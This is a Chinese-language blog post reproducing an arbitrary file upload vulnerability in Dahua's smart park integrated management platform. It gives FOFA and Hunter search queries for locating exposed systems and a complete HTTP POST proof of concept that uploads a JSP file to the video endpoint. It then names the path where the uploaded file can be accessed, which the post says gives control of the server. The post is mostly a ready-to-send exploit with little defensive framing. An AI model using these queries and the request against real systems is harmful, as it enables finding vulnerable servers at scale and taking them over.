大华智慧园区综合管理平台 video 任意文件上传漏洞
发布时间
阅读量:
阅读量
目录
漏洞描述
FOFA语法/鹰图语句
漏洞复现
漏洞描述
大华智慧园区综合管理平台视频接口存在文件上传漏洞,在该系统中攻击者可利用该漏洞随意上传至服务器内的任何文件,并从而掌握服务器的操作权限
FOFA语法/鹰图语句
fofa语句:"/WPMS/asset/lib/gridster/"或app="dahua-智慧园区综合管理平台"
鹰图语句:web.body="/WPMS/asset/lib/gridster/"
漏洞复现
1、在fofa里面搜:

登陆界面如下:

2、打开burp,把poc复制进去,然后发送

poc如下:
POST /publishing/publishing/material/file/video HTTP/1.1
Host: your-ip:8009
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
Test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7--
此操作将返回上传文件的名称。上传完成后,请访问以下路径:/publishingImg/VIDEO/230812152005170200.jsp

4、然后去访问

全部评论 (0)
还没有任何评论哟~
